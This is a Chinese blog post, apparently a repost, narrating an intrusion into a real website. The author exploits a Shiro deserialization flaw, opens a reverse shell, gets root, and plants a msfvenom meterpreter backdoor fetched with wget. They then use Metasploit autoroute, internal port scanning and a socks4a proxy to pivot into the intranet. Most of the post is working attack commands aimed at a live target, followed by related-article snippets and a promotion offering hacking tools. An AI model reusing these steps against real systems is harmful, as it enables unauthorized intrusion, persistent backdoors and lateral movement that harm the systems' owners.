<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    實戰|某網站shiro反序列化漏洞的滲透過程

    VSole2022-08-07 06:34:20

    打進內網以后的過程沒有繼續深入搞,具體原因大家懂的,

    前期打點,開始的想法是爆破個弱口令的,弱口令爆破一圈沒有找到有用的賬戶,

    返回包存在 :Set-Cookie: rememberMe=deleteMe; 參數, 測試一下 shiro漏洞,萬一沒修復就撿到了,美滋滋

    成功打到DNSLOG 返回信息

    得到log,確定漏洞是存在的,腳本寫入linux反彈shell的命令,

    vps 開啟NC 監聽 nc -lvp 777 成功返回

    獲得服務器權限 root ,開始通過dnslog 知道服務器是通外網的,利用msf 生成 elf 后門

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > 123.elf
    

    關注公眾號:hack之道,后臺回復關鍵詞:666,獲取最新滲透教程和工具。

    把生成好的后門放在遠程HTTP服務上面,

    在shell里,wget 遠程下載

    成功下載以后,chmod 給后門權限 777 就行,-rwxrwxrwx 1 root root

    msf 運行命令 use exploit/multi/handler  獲得shell反彈地址

    set payload linux/x64/meterpreter/reverse_tcp

    地址填寫VPS 端口寫后門端口就好了,直接run

    查看內網路由,添加路由命令

    run get_local_subnets //獲取路由地址
    run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
    run autoroute -p //查看添加的路由
    run autorouute -d //刪除添加的路由
    

    內網掃描端口 use auxiliary/scanner/portscan/tcp 

    利用msf socks4a模塊代理

    use auxiliary/server/socks4a 
    set SRVHOST IP
    set SRVPORT 端口
    

    運行返回信息:

    msf5 auxiliary(server/socks4a) > run
    [*] Auxiliary module running as background job 0.
    [*] Starting the socks4a proxy server
    

    本地利用代理連接 代理的服務器 設置好端口 ,瀏覽器訪問

    某會議系統

    shiro序列化
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    本文主要以拋出問題的方式,努力尋找在實際調試過程中遇到問題的真實答案,最后結合前輩們總結的知識點也用實踐檢驗了知識點,特此記錄。
    首先在奇安信hunter上搜索找到該SRC的有關資產,然后通過微步來搜索子域名找到今天的測試站點
    打進內網以后的過程沒有繼續深入搞,具體原因大家懂的,前期打點,開始的想法是爆破個弱口令的,弱口令爆破一圈沒有找到有用的賬戶
    Shiro序列化漏洞修復的過程中,如果僅進行Shiro的版本升級,而沒有重新生成密鑰,那么AES加密的默認密鑰扔硬編碼在代碼里,仍然會存在反序列化風險。
    一次成功的Shiro Padding Oracle需要一直向服務器不斷發包,判斷服務器返回,攻擊時間通常需要幾個小時。因為這些程序沒有對發包失敗拋出異常的情況做出處理,從而導致工具停止工作。最終,攻擊成功了,我虛擬機下花了不到1小時共計完成,但是在真實生產環境測試,攻擊成功一次DNS或者JRMPClient攻擊,程序需要跑大約4個小時左右,2次攻擊加起來近9個小時。
    Log4j漏洞、Shiro序列化漏洞被勒索團伙利用,威脅windows、linux雙平臺系統。
    記一次內網實戰
    2022-12-21 09:30:38
    記一次內網實戰
    最近想要針對Shiro的利用工具擴展利用鏈,但自己完全寫一個工具即麻煩也沒有必要,因此想要通過SummerSec師傅開源的工具ShiroAttack2擴展來實現,既然要擴展首先就得了解項目的源碼實現。本片文章中我不會通篇的對這個項目代碼進行分析,只抽出幾個我認為的要點進行分析。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类